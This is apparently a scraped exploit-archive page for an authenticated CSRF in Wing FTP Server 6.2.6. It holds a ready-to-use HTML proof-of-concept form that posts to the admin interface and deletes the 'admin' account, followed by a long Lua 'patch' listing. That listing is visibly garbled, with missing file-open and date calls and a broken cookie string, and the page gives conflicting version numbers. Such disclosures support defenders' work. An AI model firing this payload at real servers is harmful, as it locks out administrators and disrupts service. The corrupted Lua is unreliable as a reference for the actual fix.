wing ftp server authenticated csrf (delete admin)

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wing ftp server authenticated csrf (delete admin) Code Code...
# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation # Date: 2020-03-10 # Exploit Author: Dhiraj Mishra # Vendor Homepage: # Version: v6.2.6 # Tested on: Windows 10 *Summary:* An authenticated CSRF exists in web client and web administration of Wing FTP v6.2.6, a crafted HTML page could delete admin user from the application where as administration needs to re-install the program and add admin user again. Issue was patched in v6.2.7. *Proof of concept:* <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://IP:5466/admin_delete_admin.html" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="r" value="0&#46;9219583354400562" /> <input type="submit" value="Submit request" /> </form> </body> </html> *Patch (lua/cgiadmin.lua):* URL: local outfunc = "echo" local function out (s, i, f) s = string.sub(s, i, f or -1) if s == "" then return s end s = string.gsub(s, "([\\\n\'])", "\\%1") s = string.gsub(s, "\r", "\\r") return string.format(" %s('%s'); ", outfunc, s) end local function translate (s) s = string.gsub(s, "<%%(.-)%%>", "<??lua %1 ??>") local res = {} local start = 1 while true do local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[ \t]*(=?)(.-)%?%?>", start) if not ip then break end table.insert(res, out(s, start, ip-1)) if target ~= "" and target ~= "lua" then table.insert(res, out(s, ip, fp)) else if exp == "=" then table.insert(res, string.format(" %s(%s);", outfunc, code)) else table.insert(res, string.format(" %s ", code)) end end start = fp + 1 end table.insert(res, out(s, start)) return table.concat(res) end local function compile (src, chunkname) return loadstring(translate(src),chunkname) end function include (filename, env) if incfiles[filename] == nil then incfiles[filename] = true; path = c_GetAppPath() path = path .. "/webadmin/"..filename local errstr = string.format("<b>The page '%s' does not exist!</b>",filename) local fh,_ = (path) if not fh then echo_out = echo_out..errstr return end local src = fh:read("*a") fh:close() local prog = compile(src, path) local _env if env then _env = getfenv (prog) setfenv (prog, env) end local status,err = pcall(prog) if not status then if type(err) == "string" and not string.find(err,"exit function!") then print(string.format("some error in %s!",err)) end return end end end function var_dump(var) print("{") if type(var) == "string" or type(var) == "number" or type(var) == "boolean" or type(var) == "function" then print(var) elseif(type(var) == "thread") then print("thread") elseif(type(var) == "userdata") then print("userdata") elseif type(var) == "nil" then print("nil") elseif type(var) == "table" then for k,v in pairs(var) do if type(k) == "string" then k="'"..k.."'" end if(type(v) == "string") then print(k.."=>'"..v.."',") elseif(type(v) == "number" or type(v) == "boolean") then print(k.."=>"..tostring(v)..",") elseif(type(v) == "function") then print(k.."=>function,") elseif(type(v) == "thread") then print(k.."=>thread,") elseif(type(v) == "userdata") then print(k.."=>userdata,") elseif(type(v) == "nil") then print(k.."=>nil,") elseif(type(v) == "table") then print(k.."=>table,") else print(k.."=>object,") end end else print("object") end print("}") end function init_get() local MatchedReferer = true if _SESSION_ID ~= nil then local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") if Referer ~= nil and Referer ~= "" then local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") if Host ~= nil and Host ~= "" then if string.sub(Referer,8,string.len(Host)+7) == Host or string.sub(Referer,9,string.len(Host)+8) == Host then MatchedReferer = true else MatchedReferer = false exit() end end else MatchedReferer = false end end string.gsub (urlparam, "([^&=]+)=([^&=]*)&?", function (key, val) if key == "domain" then if MatchedReferer == true then rawset(_GET,key,val) else rawset(_GET,key,specialhtml_encode(val)) end else if MatchedReferer == true then rawset(_GET,unescape(key),unescape(val)) else --rawset(_GET,unescape(key),specialhtml_encode(unescape(val))) end end end ) end function init_post() local MatchedReferer = true if _SESSION_ID ~= nil then local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)") if Referer ~= nil and Referer ~= "" then local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)") if Host ~= nil and Host ~= "" then if string.sub(Referer,8,string.len(Host)+7) == Host or string.sub(Referer,9,string.len(Host)+8) == Host then MatchedReferer = true else MatchedReferer = false exit() end end else MatchedReferer = false end end if string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=") then string.gsub (strContent, "[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n", function (key, val) if key == "domain" then if MatchedReferer == true then rawset(_POST,key,val) else rawset(_POST,key,specialhtml_encode(val)) end else if MatchedReferer == true then rawset(_POST,unescape(key),unescape(val)) else --rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) end end end ) else string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?", function (key, val) if key == "domain" then if MatchedReferer == true then rawset(_POST,key,val) else rawset(_POST,key,specialhtml_encode(val)) end else if MatchedReferer == true then rawset(_POST,unescape(key),unescape(val)) else --rawset(_POST,unescape(key),specialhtml_encode(unescape(val))) end end end ) end end function init_session() if _COOKIE["UIDADMIN"] ~= nil then _SESSION_ID = _COOKIE["UIDADMIN"] SessionModule.load(_SESSION_ID) end end function init_cookie() local cookiestr = string.match(strHead,"[cC]ookie:%s?(%s[^\r\n]*)") if cookiestr == nil or cookiestr == "" then return end string.gsub (cookiestr, "([^%s;=]+)=([^;=]*)[;%s]?", function (key, val) rawset(_COOKIE,unescape(key),unescape(val)) end ) end function setcookie(name,value,expire_secs) if name == "UIDADMIN" then return end local expiretime ="!%A, %d-%b-%Y %H:%M:%S GMT", os.time()+3600*24*365) _SETCOOKIE = _SETCOOKIE.."Set-Cookie: ""="..value.."; expires="..expiretime.."\r\n" rawset(_COOKIE,name,value) end function getcookie(name) if name == "UIDADMIN" then return end return _COOKIE[name] end function deletecookie(name) setcookie(name,"",-10000000) end function deleteallcookies() for name,_ in pairs(_COOKIE) do deletecookie(name) end end local cookie_metatable = { __newindex = function(t,k,v) setcookie(k,v,360000) end } setmetatable(_COOKIE,cookie_metatable) session_metatable = { __newindex = function(t,k,v) if type(v) ~= "table" then if k ~= nil then k = string.gsub(k,"'","") k = string.gsub(k,"\"","") end if v ~= nil then --v = string.gsub(v,"%[","") --v = string.gsub(v,"%]","") end rawset(_SESSION,k,v) end end } --setmetatable(_SESSION,session_metatable) function init_all() init_cookie() init_session() init_get() init_post() end function setContentType(typestr) _CONTENTTYPE = typestr end function exit() error("exit function!") end

Wing ftp server authenticated csrf (delete admin) Vulnerability / Exploit Source : Wing ftp server authenticated csrf (delete admin)

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